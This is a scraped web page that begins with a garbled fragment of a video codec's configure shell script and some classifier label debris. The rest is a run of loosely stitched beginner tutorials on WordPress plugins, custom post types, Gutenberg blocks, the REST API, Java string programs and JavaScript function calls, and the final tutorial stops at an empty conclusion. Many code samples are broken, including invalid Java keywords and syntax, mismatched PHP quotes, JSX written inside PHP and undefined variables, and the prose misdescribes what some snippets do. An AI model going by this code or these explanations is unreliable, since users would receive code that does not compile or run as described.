VERSION_MAJOR=${ver%.*} fi enabled child || cat <> config.mk PREFIX=${prefix} ifeq (\$(MAKECMDGOALS),dist) DIST_DIR?=${DIST_DIR} else DIST_DIR?=\$(DESTDIR)${prefix} endif LIBSUBDIR=${libdir##${prefix}/} VERSION_STRING=${VERSION_STRING} VERSION_MAJOR=${VERSION_MAJOR} VERSION_MINOR=${VERSION_MINOR} VERSION_PATCH=${VERSION_PATCH} CONFIGURE_ARGS=${CONFIGURE_ARGS} EOF enabled child || echo "CONFIGURE_ARGS?=${CONFIGURE_ARGS}" >> config.mk # # Write makefiles for all enabled targets # for tgt in libs examples docs solution; do tgt_fn="$tgt-$toolchain.mk" if enabled $tgt; then echo "Creating makefiles for ${toolchain} ${tgt}" write_common_target_config_mk $tgt_fn ${BUILD_PFX}aom_config.h #write_${tgt}_config fi done } process_detect() { if enabled shared; then # Can only build shared libs on a subset of platforms. Doing this check # here rather than at option parse time because the target auto-detect # magic happens after the command line has been parsed. case "${tgt_os}" in linux|os2|darwin*|iphonesimulator*) # Supported platforms ;; *) if enabled gnu; then echo "--enable-shared is only supported on ELF; assuming this is OK" else die "--enable-shared only supported on ELF, OS/2, and Darwin for now" fi ;; esac fi if [ -z "$CC" ] || enabled external_build; then echo "Bypassing toolchain for environment detection." enable_feature external_build check_header() { log fake_check_header "$@" header=$1 shift var=`echo $header | sed 's/[^A-Za-z0-9_]/_/g'` disable_feature $var # Headers common to all environments case $header in stdio.h) true; ;; *) result=false for d in "$@"; do [ -f "${d##-I}/$header" ] && result=true && break done ${result:-true} esac && enable_feature $var # Specialize windows and POSIX environments. case $toolchain in *-win*-*) # Don't check for any headers in Windows builds. false ;; *) case $header in pthread.h) true;; unistd.h) true;; *) false;; esac && enable_feature $var esac enabled $var } check_ld() { true } fi check_header stdio.h || die "Unable to invoke compiler: ${CC} ${CFLAGS}" check_ld <> ${BUILD_PFX}aom_config.c #include "aom/aom_codec.h" static const char* const cfg = "$CONFIGURE_ARGS"; const char *aom_codec_build_config(void) {return cfg;} EOF
|
__label__pos
| 0.810341 |
How to Create a WordPress Plugin: A Step-by-Step Guide !
Creating a custom WordPress plugin allows you to add specific functionalities to your website, enhancing its features and tailoring it to your needs. In this step-by-step guide, we’ll walk you through the process of creating a simple WordPress plugin from scratch using code. Whether you’re a developer or just starting out, this guide will help you get started on the right track.
Understanding WordPress Plugins
A WordPress plugin is a piece of code that adds new features or functionalities to your WordPress website. Plugins can range from simple tasks like adding a contact form to complex features like e-commerce integration. Plugins allow you to extend the core functionality of WordPress without modifying its source code.
Setting Up Your Development Environment
To get started, you need a local development environment. You can use tools like XAMPP or WAMP to set up a server environment on your computer for testing and development.
Creating a Plugin Folder
In your WordPress installation directory, navigate to wp-content/plugins/.
Create a new folder for your plugin, naming it something descriptive and unique, like my-custom-plugin.
Understanding the Basic Structure
Inside your plugin folder, create a PHP file with the same name as your folder, such as my-custom-plugin.php. This file will serve as the main entry point for your plugin.
Adding Plugin Information and Header
In your main plugin file, start by adding a plugin header with essential information:
/*
Plugin Name: My Custom Plugin
Description: Add custom functionality to your WordPress site.
Version: 1.0
Author: Your Name
*/
Writing Your First Function
Let’s create a simple function that displays a welcome message on your website:
function custom_welcome_message() {
echo '<p>Welcome to my website! Thanks for visiting.</p>';
}
Using WordPress Hooks and Filters
To display our welcome message, we’ll use a WordPress hook. Add this line below your function to hook it into the content area of your website:
add_action('wp_footer', 'custom_welcome_message');
Now, when you refresh your website, you should see the welcome message at the bottom of the page.
Activating Your Plugin
In your WordPress admin dashboard, go to “Plugins” and activate your custom plugin. You should immediately see the welcome message on your website.
Debugging and Troubleshooting
During development, you might encounter errors or unexpected behavior. Use the built-in debugging tools in WordPress (WP_DEBUG) to identify and fix issues.
Adding Admin Menus and Pages
You can create admin menus and pages for your plugin to provide a user interface. For example, let’s create an admin page that displays a settings form:
function custom_plugin_menu() {
add_menu_page('Custom Plugin Settings', 'Custom Plugin', 'manage_options', 'custom-plugin', 'custom_plugin_settings_page');
}
function custom_plugin_settings_page() {
echo '<div class="wrap">
<h2>Custom Plugin Settings</h2>
<form method="post" action="options.php">
<!-- Your form fields here -->
</form>
</div>';
}
add_action('admin_menu', 'custom_plugin_menu');
Creating Shortcodes
Shortcodes allow users to add custom functionality to their posts or pages. Let’s create a shortcode that displays a special message:
function custom_shortcode() {
return '<p class="txt">This is a special message from my plugin!</p>';
}
add_shortcode('custom_message', 'custom_shortcode');
Now users can use the shortcode [custom_message] in their content to display the message.
Enqueuing Stylesheets and Scripts
You can style your plugin by enqueuing CSS and JavaScript files. Create a directory named css within your plugin folder and add a style.css file:
function enqueue_custom_styles() {
wp_enqueue_style('custom-style', plugins_url('css/style.css', __FILE__));
}
add_action('wp_enqueue_scripts', 'enqueue_custom_styles');
Adding Custom CSS
In your style.css file, you can add custom styles for your plugin’s elements:
/* Your custom styles here */
.txt{
background:#fff;
text-align:center;
}
Conclusion
Creating a WordPress plugin from scratch is a rewarding experience that empowers you to enhance your website’s functionality. With this guide, you’ve learned the basics of creating a plugin, adding functionalities, testing, and styling. Now you can continue exploring and building more advanced plugins to take your WordPress site to the next level.
Program to Check if String is Palindrome.
Check String Length in string is a common operation in Java programming. It helps in various scenarios, such as determining the Counting of a user input or validating the input length against certain criteria. In the following sections, we will explore different approaches to accomplish this task efficiently.
Initializing the String
Before we begin counting the characters, we need to have a string to work with. In Java, you can initialize a string using the String class.
String str= "String is Palendrome";
Using the length() Method
The simplest way to count the characters in a string is by using the length() method provided by the String class. This method returns the number of characters in the string.
str.length();
Using the Condition to check String is boolean
Another approach to count the characters in a string is by using a loop. We can iterate over each character in the string and increment a counter variable.
str = str.toLowerCase(); // Convert the string to lowercase for case-insensitive comparison
int left = 0;
int right = str.length() – 1;
while (left < right) {
if (str.charAt(left) != str.charAt(right)) {
return false;
}
left++;
right–;
}
Performance Considerations
When counting characters in a string, it’s important to consider performance. The length() method has a time complexity of O(1) as it directly returns the length. However, using a loop to count characters has a time complexity of O(n) since it iterates over each character.
Sample code
public class Stringispalendrome{
public static void main(String[] args) {
String input = "madam"; // Example input string
if (isPalindrome(input)) {
System.out.println("The string is a palindrome.");
} else {
System.out.println("The string is not a palindrome.");
}
}
public static boolean isPalindrome(String str) {
str = str.toLowerCase(); // Convert the string to lowercase for case-insensitive comparison
int left = 0;
int right = str.length() - 1;
while (left < right) {
if (str.charAt(left) != str.charAt(right)) {
return false;
}
left++;
right--;
}
return true;
}
}
In this program, we have directly assigned a string to the input variable for demonstration purposes. You can modify the value of input to test different strings. The isPalindrome function is the same as in the previous example, which checks whether the string is a palindrome or not. After calling the function, the program prints the appropriate message based on the result.
Remember to replace the input variable with the string you want to check for palindrome property.
Custom Post Type with WP Meta Box: A Comprehensive Guide!
In today’s digital world, creating custom post types is a common practice among website developers and content creators. WordPress, being a popular content management system, provides a powerful tool called WP Meta Box that allows developers to add custom fields and meta boxes to their custom post types. In this article, we will explore the concept of custom post types and delve into the functionalities and benefits of using WP Meta Box. So let’s dive in!
What are Custom Post Types and their uses ?
Custom post types are a feature of WordPress that enables you to create and manage different types of content beyond the traditional posts and pages. With custom post types, you can define your own content structures, such as portfolios, testimonials, products, events, and more. It allows you to organize and present your content in a structured manner, tailored to your specific needs. Using custom post types offers several advantages. It helps in better organization and management of diverse content types, improves user experience by providing targeted templates and layouts, and enhances the overall flexibility of your website. Custom post types also contribute to better search engine optimization (SEO) and allow you to extend the functionality of your WordPress site beyond its core capabilities.
WP Meta Box installation and Setup
WP Meta Box is a powerful WordPress plugin that simplifies the process of creating custom post types, custom fields, and meta boxes. It provides a user-friendly interface and a comprehensive set of features to manage and display custom fields in the WordPress admin area. WP Meta Box is widely adopted by developers and is known for its flexibility, extensibility, and compatibility with other popular plugins and themes. To get started with WP Meta Box, you need to install and activate the plugin or you can use wordpress hook to create meta box. Below is the sample code to create WP meta box.
Creating Custom Post Types with WP Meta Box
With WP Meta Box, creating custom post types is a straightforward process. Let’s go through the steps to create a custom post type:
1. Access the WP Meta Box settings in the WordPress admin menu.
2. Click on “Custom Post Types” to create a new post type.
3. Provide a name, labels, and other settings for your custom post type.
4. Save the settings, and your custom post type is ready to use.
You can further customize the post type by specifying the available fields, taxonomies, and other options according to your requirements.
Adding Custom Fields and Meta Boxes
WP Meta Box allows you to add custom fields and meta boxes to your custom post types effortlessly.
Displaying Custom Fields and Meta Boxes
Once you have added custom fields and meta boxes to your custom post types, you may want to display them on the front end of your website. WP Meta Box provides various methods to achieve this, including shortcode, template functions, and block editor integration. You can choose the most suitable approach based on your development workflow and requirements.
To get Started with WP Meta Box with Custom Post Type Follow Below Steps.
Step 1: Define your custom post type
To define your custom post type, you need to use the register_post_type() function. Here’s an example of how to create a custom post type for a myposttype:
function create_my_post_type() {
$args = array(
'labels' => array(
'name' => __( 'My Post type' ),
'singular_name' => __( 'My Post Type' ),
),
'public' => true,
'has_archive' => true,
'rewrite' => array( 'slug' => 'myposttype' ),
'menu_icon' => 'dashicons-portfolio',
'supports' => array( 'title', 'editor', 'thumbnail' ),
);
register_post_type( 'myposttype', $args );
}
add_action( 'init', 'create_my_post_type' );
Step 2: Create custom meta boxes
If you want to add custom fields to your custom post type, you can use the add_meta_box() function. Here’s an example of how to create a meta box for a myposttype:
function add_myposttype_metaboxes() {
add_meta_box(
'myposttype_meta',
'Myposttype Details',
'myposttype_meta_callback',
'myposttype',
'normal',
'default'
);
}
add_action( 'add_meta_boxes', 'add_myposttype_metaboxes' );
function myposttype_meta_callback( $post ) {
wp_nonce_field( basename( __FILE__ ), 'myposttype_nonce' );
$portfolio_meta = get_post_meta( $post->ID );
?>
<label for="myposttype_year"><?php _e( 'Year' ); ?></label>
<input type="text" name="myposttype_year" id="myposttype_year" value="<?php if ( isset ( $myposttype_meta['myposttype_year'] ) ) echo $myposttype_meta['myposttype_year'][0]; ?>" />
<?php
}
Step 3: Save custom meta box data
To save the custom meta box data, you need to use the save_post hook. Here’s an example of how to save the myposttype year meta box data:
function save_myposttype_meta( $post_id ) {
// Checks save status
$is_autosave = wp_is_post_autosave( $post_id );
$is_revision = wp_is_post_revision( $post_id );
$is_valid_nonce = ( isset( $_POST['myposttype_nonce'] ) && wp_verify_nonce( $_POST['myposttype_nonce'], basename( __FILE__ ) ) ) ? 'true' : 'false';
// Exits script depending on save status
if ( $is_autosave || $is_revision || !$is_valid_nonce ) {
return;
}
// Checks for input and sanitizes/saves if needed
if( isset( $_POST['myposttype_year'] ) ) {
update_post_meta( $post_id, 'myposttype_year', sanitize_text_field( $_POST['myposttype_year'] ) );
}
}
add_action( 'save_post', 'save_myposttype_meta' );
Step 4: Display custom post type on the front-end
To display your custom post type on the front-end of your site, you need to use a custom query. Here’s an example of how to display a list of myposttype items:
$args = array(
'post_type' => 'myposttype',
'posts_per_page' => 10,
);
$query = new WP_Query( $args );
if ( $query->have_posts() ) {
while ( $query->have_posts()): the_post();
echo '<h1'>'.the_title().''</h1>';
echo '<p>''.the_content().''</p>';
endwhile; endif;
Best Practices for Custom Post Types
When working with custom post types and WP Meta Box, it’s essential to follow best practices to ensure optimal performance and maintainability. Here are some guidelines to keep in mind:
1. Plan your content structure and taxonomy hierarchy before creating custom post types.
2. Use descriptive names and labels for your post types, fields, and meta boxes.
3. Keep your code organized and modular by utilizing reusable functions and classes.
4. Regularly update and maintain your custom post types and WP Meta Box plugin.
5. Test your custom post types thoroughly across different devices and browsers.
By adhering to these best practices, you can create robust and future-proof custom post types.
Compatibility and Integration
WP Meta Box is designed to seamlessly integrate with other popular WordPress plugins and themes. It offers compatibility with plugins like Advanced Custom Fields (ACF), Yoast SEO, and WooCommerce. You can leverage this integration to extend the functionality of your custom post types and create more versatile and engaging websites.
Gutenberg Block Development with WordPress Hooks !
WordPress has revolutionized the way we create and manage websites, making it more accessible and user-friendly for everyone. One of the key features that has contributed to this revolution is Gutenberg, the block editor introduced in WordPress 5.0. With Gutenberg, developers have the ability to create custom blocks and extend the functionality of their websites using WordPress hooks. In this article, we will explore Gutenberg block development using WordPress hooks and delve into the power and flexibility it offers to WordPress developers.
Gutenberg blocks are the building blocks of content in the WordPress block editor. Each block represents a specific piece of content or functionality that can be added to a post or page. With Gutenberg, developers can create custom blocks that cater to their specific needs, allowing them to extend the capabilities of the editor beyond the default set of blocks provided by WordPress.
Understanding WordPress Hooks
WordPress hooks are a powerful mechanism that allows developers to modify or extend the behavior of WordPress core, themes, and plugins. Hooks are divided into two types: actions and filters. Actions are events triggered at specific points in the WordPress execution flow, while filters allow developers to modify data before it is displayed or saved.
Creating a Custom Gutenberg Block
To create a custom Gutenberg block, we need to define a block type using JavaScript. This involves registering the block, specifying its attributes, rendering its content, and adding any necessary editor controls. By following the Gutenberg block development documentation, developers can easily create custom blocks tailored to their specific requirements.
Registering and Enqueuing Block Assets
Once the custom Gutenberg block is defined, we need to register and enqueue its assets. This includes JavaScript and CSS files that contain the block’s logic and styling. By properly enqueuing the assets, we ensure that they are loaded only when needed, minimizing the impact on page loading times and improving overall performance.
Adding Custom Attributes and Styles to Blocks
Custom attributes allow developers to store additional data for each instance of a block. By adding custom attributes, developers can make their blocks more dynamic and flexible. Additionally, custom styles can be applied to blocks to enhance their visual appearance and provide a better user experience.
Implementing Dynamic Block Content
Dynamic block content allows users to interact with blocks and update their content dynamically. By implementing dynamic block content, developers can create blocks that display dynamic data fetched from external sources or modified based on user input. This adds a layer of interactivity and makes the blocks more versatile.
Extending Block Functionality with Hooks
WordPress hooks can be used to extend the functionality of Gutenberg blocks. Developers can hook into various actions and filters to modify block behavior, add custom controls, or perform additional actions based on user interactions. This flexibility allows developers to create highly customized and powerful blocks that cater to specific use cases.
Enhancing Block Editor Experience
To provide a seamless editing experience for users, it’s essential to enhance the block editor with additional features. This can include adding custom meta boxes, integrating with third-party APIs, or implementing keyboard shortcuts. By enhancing the block editor experience, developers can improve productivity and streamline the content creation process.
Testing and Debugging Gutenberg Blocks
Thorough testing and debugging are crucial in Gutenberg block development. WordPress provides several tools and techniques for testing blocks, such as the Gutenberg plugin for WordPress, unit testing with Jest, and browser-based testing. Proper testing ensures that the blocks work as expected and minimizes the chances of encountering issues in a production environment.
To create a custom Gutenberg block in WordPress, follow these steps:
• Create a new plugin or use an existing one where you can add your custom block code.
• Enqueue the necessary scripts and stylesheets for Gutenberg block development in your plugin file using the enqueue_block_editor_assets hook. This will make sure that your block is properly styled and has access to the necessary functionality.
• Define your custom block using the registerBlockType function. This function takes an object as its argument, which defines the block’s attributes, such as its name, icon, category, and edit and save functions.
• In the edit function, use React to create the block’s user interface. This is where you’ll define the markup and behavior of your block.
• In the save function, define how the block’s content should be saved to the database. This function should return the markup that was generated in the edit function.
// Enqueue the necessary scripts and stylesheets
function my_custom_block_assets() {
wp_enqueue_script(
'my-custom-block',
plugin_dir_url( __FILE__ ) . 'block.js',
array( 'wp-blocks', 'wp-element' )
);
}
add_action( 'enqueue_block_editor_assets', 'my_custom_block_assets' );
// Define the custom block
function my_custom_block_init() {
register_block_type( 'my-plugin/my-custom-block', array(
'editor_script' => 'my-custom-block',
'attributes' => array(
'content' => array(
'type' => 'string',
'source' => 'html',
'selector' => '.my-custom-block',
),
),
'render_callback' => 'my_custom_block_render',
) );
}
add_action( 'init', 'my_custom_block_init' );
// Define the edit function
function my_custom_block_edit( props ) {
return (
<div className={ props.className }>
<h2>My Custom Block</h2>
<p>Edit the content here:</p>
<RichText
tagName="div"
className="my-custom-block"
value={ props.attributes.content }
onChange={ ( content ) => props.setAttributes( { content } ) }
/>
</div>
);
}
// Define the save function
function my_custom_block_save( props ) {
return (
<div className={ props.className }>
<RichText.Content
tagName="div"
className="my-custom-block"
value={ props.attributes.content }
/>
</div>
);
}
// Define the render function
function my_custom_block_render( props ) {
return (
<div className={ props.className }>
<h2>My Custom Block</h2>
<div className="my-custom-block" dangerouslySetInnerHTML={ { __html: props.attributes.content } } />
</div>
);
}
Conclusion
Gutenberg block development using WordPress hooks provides developers with the ability to create custom blocks that extend the functionality of the WordPress block editor. By leveraging WordPress hooks, developers can add dynamic content, enhance block functionality, and provide a better editing experience for users. With the power and flexibility of Gutenberg and WordPress hooks, the possibilities for creating unique and interactive websites are endless.
Program to Count the Total Number of Characters in a given String.
Counting the total number of characters in a string is a common operation in Java programming. It helps in various scenarios, such as determining the length of a user input or validating the input length against certain criteria. In the following sections, we will explore different approaches to accomplish this task efficiently.
Initializing the String
Before we begin counting the characters, we need to have a string to work with. In Java, you can initialize a string using the String class.
String str= "Count Total Characters";
Using the length() Method
The simplest way to count the characters in a string is by using the length() method provided by the String class. This method returns the number of characters in the string.
str.length();
Using a Loop to Count Characters
Another approach to count the characters in a string is by using a loop. We can iterate over each character in the string and increment a counter variable.
for(int i=0;i<str.length();i++) {
if(str.charAt(i)!=' ' ) {
count++;
}
}
Performance Considerations
When counting characters in a string, it’s important to consider performance. The length() method has a time complexity of O(1) as it directly returns the length. However, using a loop to count characters has a time complexity of O(n) since it iterates over each character.
Sample code
public class CountCharacters{
public Static Void main(string[] args) {
String str= "Count Total Characters";
int count= 0;
System.out.println("Length of String is " + str.length());
for(int i=0;i<str.length();i++) {
if(str.charAt(i)!=' ' ) {
count++;
}
}
System.out.println("count of characters" + count+);
}
}
Output :
Length of String is :22
Count of characters : 19
Conclusion
Counting the total number of characters in a given string is a fundamental task in Java programming. In this article, we explored various approaches to accomplish this task efficiently, including using the length() method, loops and count the no of characters.
Remember to consider the performance implications of each approach and choose the one that best suits your specific requirements.
How to Call JavaScript Functions: A Comprehensive Guide
JavaScript is a powerful programming language that allows developers to add interactivity and dynamic behavior to web pages. One of the fundamental concepts in JavaScript is the ability to call functions. In this article, we will explore the various ways to call JavaScript functions and provide you with a step-by-step guide. Whether you are a beginner or an experienced developer, this article will help you understand the different techniques and best practices for calling JavaScript functions effectively.
JavaScript functions are blocks of reusable code that perform specific tasks. They allow you to organize your code, make it modular, and promote code reuse. Calling a function means executing the code within the function body at a specific point in your program.
Calling Functions with Parentheses
function test(){
var x=10;
console.log(x);
}
test(); // Calling the function
By including parentheses after the function name, you invoke the function and execute its code.
Passing Arguments to Functions
JavaScript functions can also accept parameters or arguments. Arguments are values that you can pass to a function to customize its behavior. You can pass arguments by including them within the parentheses when calling the function. Here’s an example:
function test(name) {
console.log("Hi, " + name);
}
test("techintricks"); // Calling the function with an argument
In this example, the test function accepts a name parameter, which is then used to personalize the greeting.
Returning Values from Functions
Functions in JavaScript can also return values. You can use the return statement to specify the value that the function should produce. Here’s an example:
function test(x,y){
let z=x+y;
return z;
}
let addition=test(1,2); // Calling the function and storing the result
console.log(addition);//output 3
In this example, the test function returns the sum of two numbers, which is then stored in the addition variable.
Calling Functions as Event Handlers
JavaScript functions are often used as event handlers to respond to user interactions. You can assign a function to an event, such as a button click, and the function will be called when the event occurs. Here’s an example:
<button onclick="test()">Click me</button>
In this example, the test function will be called when the button is clicked.
Calling Functions using Arrow Functions
Arrow functions are a concise syntax for writing JavaScript functions. They provide a more compact way to define functions and have some differences in how they handle the this keyword. Here’s an example:
let sayHello = () => {
console.log("Hello, World!");
};
sayHello(); // Calling the arrow function
Arrow functions are particularly useful when working with callback functions or when you want to preserve the value of this from the surrounding context.
Asynchronous Function Calls
JavaScript supports asynchronous programming, where functions can be called asynchronously and continue execution without waiting for the result. Asynchronous function calls are commonly used when dealing with network requests, timers, or other time-consuming operations. Promises and async/await are popular techniques for handling asynchronous calls in JavaScript.
Error Handling and Exception Handling
When calling JavaScript functions, it’s essential to handle errors and exceptions gracefully. You can use try-catch blocks to catch and handle exceptions that may occur during function execution. Error handling ensures that your program continues to run smoothly even in the presence of unexpected errors.
Best Practices for Calling JavaScript Functions
To ensure clean and maintainable code, it’s essential to follow some best practices when calling JavaScript functions. These include giving meaningful names to functions, avoiding excessive nesting, and keeping your functions small and focused.
Conclusion
In conclusion, calling JavaScript functions is a fundamental concept that allows you to execute code and perform specific tasks. By understanding the various techniques and best practices for calling functions, you can write more efficient and maintainable JavaScript code. Remember to use parentheses, pass arguments, and handle return values appropriately. Additionally, explore advanced topics like asynchronous function calls and error handling to enhance your JavaScript skills.
A Beginner’s Guide to Create an Custom Post Type in WordPress !
WordPress is a popular content management system that allows users to create and manage websites with ease. One of the key features of WordPress is the ability to create custom post types, which enable you to organize and display different types of content on your website. In this beginner’s guide, we will walk you through the process of creating a custom post type in WordPress, step by step.
What is custom post type ?
Custom Post type is a post type where we can create our own post type according to requirement. Once a custom post type is registered, it gets a new top-level administrative screen that can be used to make changes in posts of that type.
Why we need Custom Post Type ?
To add additional functionality to our website. Once created , we can modify functionality of our website easily. Lets Understand with simple example.
Ex :- Suppose , We have resturant website and wants to add two different menu like menu-1 , menu-2. How can we add ?
Using wordpress default post we can create menu-1 easily but for menu-2 we have create another wordpress post type that is called as custom post type in which we can add more fields for more data.
Planning Your Custom Post Type
Before jumping into creating a custom post type, it’s essential to plan its structure and functionality. Consider the purpose of your post type, the specific data you want to collect, and how you want to display it on your website. This planning phase will help you define the parameters and settings required for your custom post type.
Registering the Custom Post Type
To create a custom post type, you need to register it with WordPress. This can be done by adding code to your theme’s functions.php file or by using a custom plugin. The registration process involves defining the labels, settings, and capabilities of your post type. Once registered, your custom post type will appear in the WordPress admin dashboard.
Customizing the Custom Post Type
After registering your custom post type, you can further customize its behavior and appearance. This includes modifying labels, adding support for specific features like thumbnails or comments, and setting up the post type’s capabilities and permissions. Customizing your custom post type ensures that it functions exactly as intended.
Displaying the Custom Post Type
Once you’ve created and customized your custom post type, you’ll want to display it on your website. This can be achieved by creating custom templates or modifying existing ones to accommodate the new post type. You can also utilize plugins and theme builders that provide easy-to-use interfaces for displaying custom post types.
Adding Custom Fields to the Custom Post Type
Custom fields allow you to collect additional data for your custom post type. They can be used to gather information such as author details, event dates, or product specifications. WordPress provides built-in support for custom fields, and you can also use plugins to enhance the functionality and appearance of your custom fields.
Implementing Taxonomies
Taxonomies are used to classify and organize content within your custom post type. They enable you to create hierarchical or non-hierarchical structures such as categories and tags. By implementing taxonomies, you can enhance the usability and discoverability of your content, making it easier for users to navigate your website.
Enabling Custom Post Type Archives
Archives allow you to display a list of all posts belonging to a specific custom post type. Enabling archives for your custom post type ensures that visitors can access and browse through your content efficiently. You can customize the archive template and use plugins to enhance the archive functionality with filtering and sorting options.
Customizing the Single Post View
The single post view is the page that displays an individual post of your custom post type. You can customize this view to match the design and layout of your website. By modifying the single post template, you can showcase the unique attributes of your custom post type and provide an engaging reading experience for your visitors.
Adding Custom Post Type Templates
In addition to customizing the single post view, you can create custom templates for other views related to your custom post type. These include the archive template, search results template, and category template. By designing these templates, you can ensure a consistent and cohesive presentation of your custom post type throughout your website.
Applying Styling to the Custom Post Type
To create a visually appealing custom post type, you can apply custom styles using CSS. By targeting the elements specific to your post type, you can modify their appearance, layout, and typography. This allows you to integrate your custom post type seamlessly with the overall design of your website and maintain a consistent visual identity.
Managing Custom Post Type Permalinks
Permalinks are the URLs that point to individual posts of your custom post type. It’s important to set up proper permalink structure for your custom post type to ensure search engine friendliness and user-friendly URLs. WordPress provides options to customize the permalinks and ensure they are easy to read and remember.
Troubleshooting Common Issues
While creating a custom post type, you may encounter certain issues or errors. These could range from incorrect template rendering to conflicts with other plugins or themes. Troubleshooting common issues involves identifying the problem, debugging the code, and seeking help from the WordPress community or support forums.
Steps to create a Custom Post type in WordPress !
• Navigate to theme folder open functions.php file and add below code into that. If you are using child theme you can follow same procedures.
function wpdocs_kantbtrue_init() {
$labels = array(
'name' => _x( 'Recipes', 'Post type general name', 'recipe' ),
'singular_name' => _x( 'Recipe', 'Post type singular name', 'recipe' ),
'menu_name' => _x( 'Recipes', 'Admin Menu text', 'recipe' ),
'name_admin_bar' => _x( 'Recipe', 'Add New on Toolbar', 'recipe' ),
'add_new' => __( 'Add New', 'recipe' ),
'add_new_item' => __( 'Add New recipe', 'recipe' ),
'new_item' => __( 'New recipe', 'recipe' ),
'edit_item' => __( 'Edit recipe', 'recipe' ),
'view_item' => __( 'View recipe', 'recipe' ),
'all_items' => __( 'All recipes', 'recipe' ),
'search_items' => __( 'Search recipes', 'recipe' ),
'parent_item_colon' => __( 'Parent recipes:', 'recipe' ),
'not_found' => __( 'No recipes found.', 'recipe' ),
'not_found_in_trash' => __( 'No recipes found in Trash.', 'recipe' ),
'featured_image' => _x( 'Recipe Cover Image', 'Overrides the “Featured Image” phrase for this post type. Added in 4.3', 'recipe' ),
'set_featured_image' => _x( 'Set cover image', 'Overrides the “Set featured image” phrase for this post type. Added in 4.3', 'recipe' ),
'remove_featured_image' => _x( 'Remove cover image', 'Overrides the “Remove featured image” phrase for this post type. Added in 4.3', 'recipe' ),
'use_featured_image' => _x( 'Use as cover image', 'Overrides the “Use as featured image” phrase for this post type. Added in 4.3', 'recipe' ),
'archives' => _x( 'Recipe archives', 'The post type archive label used in nav menus. Default “Post Archives”. Added in 4.4', 'recipe' ),
'insert_into_item' => _x( 'Insert into recipe', 'Overrides the “Insert into post”/”Insert into page” phrase (used when inserting media into a post). Added in 4.4', 'recipe' ),
'uploaded_to_this_item' => _x( 'Uploaded to this recipe', 'Overrides the “Uploaded to this post”/”Uploaded to this page” phrase (used when viewing media attached to a post). Added in 4.4', 'recipe' ),
'filter_items_list' => _x( 'Filter recipes list', 'Screen reader text for the filter links heading on the post type listing screen. Default “Filter posts list”/”Filter pages list”. Added in 4.4', 'recipe' ),
'items_list_navigation' => _x( 'Recipes list navigation', 'Screen reader text for the pagination heading on the post type listing screen. Default “Posts list navigation”/”Pages list navigation”. Added in 4.4', 'recipe' ),
'items_list' => _x( 'Recipes list', 'Screen reader text for the items list heading on the post type listing screen. Default “Posts list”/”Pages list”. Added in 4.4', 'recipe' ),
);
$args = array(
'labels' => $labels,
'description' => 'Recipe custom post type.',
'public' => true,
'publicly_queryable' => true,
'show_ui' => true,
'show_in_menu' => true,
'query_var' => true,
'rewrite' => array( 'slug' => 'recipe' ),
'capability_type' => 'post',
'has_archive' => true,
'hierarchical' => false,
'menu_position' => 20,
'supports' => array( 'title', 'editor', 'author', 'thumbnail' ),
'taxonomies' => array( 'category', 'post_tag' ),
'show_in_rest' => true
);
register_post_type( 'Recipe', $args );
}
add_action( 'init', 'wpdocs_kantbtrue_init' );
Conclusion
Creating a custom post type in WordPress opens up endless possibilities for organizing and presenting your content. By following the steps outlined in this beginner’s guide, you can confidently create your own custom post type, tailor-made to suit your website’s unique requirements. Embrace the flexibility and power of WordPress, and enjoy the enhanced functionality and user experience that custom post types bring.
Get Started with WordPress REST API: A Complete Guide using WP Hooks
WordPress has come a long way from being a simple blogging platform to a versatile content management system (CMS) that powers millions of websites across the globe. One of the powerful features it offers is the WordPress REST API, which allows developers to interact with the platform programmatically and build innovative applications. In this comprehensive guide, we’ll dive into the world of WordPress REST API, focusing on how to leverage its capabilities using WP hooks.
Making WordPress REST API Work for You
The WordPress REST API opens up a world of possibilities for developers to create dynamic and interactive websites, applications, and services. By harnessing the power of WP hooks, you can seamlessly integrate custom functionality into your WordPress site and craft a unique user experience. Whether you’re a seasoned developer or just starting, the REST API provides a flexible foundation for building innovative solutions that push the boundaries of what’s possible.
Benefits of Using WP Hooks with REST API
Integrating WP Hooks with the REST API opens up a world of possibilities for extending WordPress functionality. It enables developers to create custom endpoints, manipulate responses, and enhance user experience without compromising security or stability.
Setting Up Your Environment
Before diving into using WP Hooks with the REST API, it’s important to have a development environment ready. You can set up a local server using tools like XAMPP or use online platforms like WPEngine for testing.
Making API Requests with WP Hooks
WP Hooks provide methods to interact with REST API endpoints. You can use hooks like wp_remote_get and wp_remote_post to make requests and retrieve data from external sources. This flexibility enables you to integrate third-party services seamlessly.
What are the some key points of WordPress Rest API ?
Routes & Endpoints
route is URL where we can map it with http method like GET,POST etc. while an endpoint is a connection between an individual HTTP method and a route.
Ex : – /wp-json is a route, and when that route receives a GET request then that request is handled by the endpoint which displays what is known as the index for the WordPress REST API.
Requests
Request is represented by an instance of the WP_REST_REQUEST class , using this class we can store and retrieve information for current request. It is automatically generated when we make HTTP request to a registered API route.
Responses
We are getting data from the API in Response. The WP_REST_RESPONSE class provides a way to interact with the response data returned by endpoints.
Schema
Schema’s are defined in data structured format. The schema structures API data and provides a comprehensive list of all of the properties the API can return and which input parameters it can accept.
Controller Classes
Using controller class we can manage the registration of routes & endpoints, handle requests, utilize schema, and generate API responses.
Creating an API by Using plugin
Using plugin , We can create an API.
• Add WordPress REST API Basic Auth plugin.
• Log in to your WordPress Dashboard and go to Plugins -> Add New. Click on the Upload Plugin button and select the plugin’s zip file or directly search Basic Auth from Search bar , you will get plugin name click on install button and after installation click on activate button to activate the plugin.
• Once Basic Auth is installed, open CLI and authenticate an API request by utilizing the user flag.
Ex : – curl -X GET –user username:password -i your curl url.
Practical Examples and Use Cases
To solidify your understanding, let’s explore practical examples such as creating a custom post endpoint, integrating with popular services like Google Maps, and automating social media sharing using WP Hooks.
Examples
require get_template_directory() . '/myapi/myfile.php';
Suppose if you want to create an API then create one file inside myapi folder name and below code into this.
<?php
add_action( 'rest_api_init', function () {
register_rest_route( 'gp', '/listpost', array(
'methods' => 'GET',
'callback' => 'get_blog_data',
) );
} );
function get_blog_data(){
global $post;
$args = array('post_type'=>'post','numberposts' => 5);
$myposts = get_posts( $args );
$dataArray=array();
foreach($myposts as $post){
$arr=array();
$arr['id']=$post->ID;
$arr['post_title']=$post->post_title;
$arr['post_content']=wp_trim_words($post->post_content);
$arr['post_date']=$post->post_date;
$arr['guid']=$post->guid;
$arr['thumbnail']=wp_get_attachment_image_src( $post->ID, 'full' );
$dataArray[]=$arr;
}
return $dataArray;
}
?>
Url should be – yourhostname/wp/wp-json/gp/listpost.
Conclusion
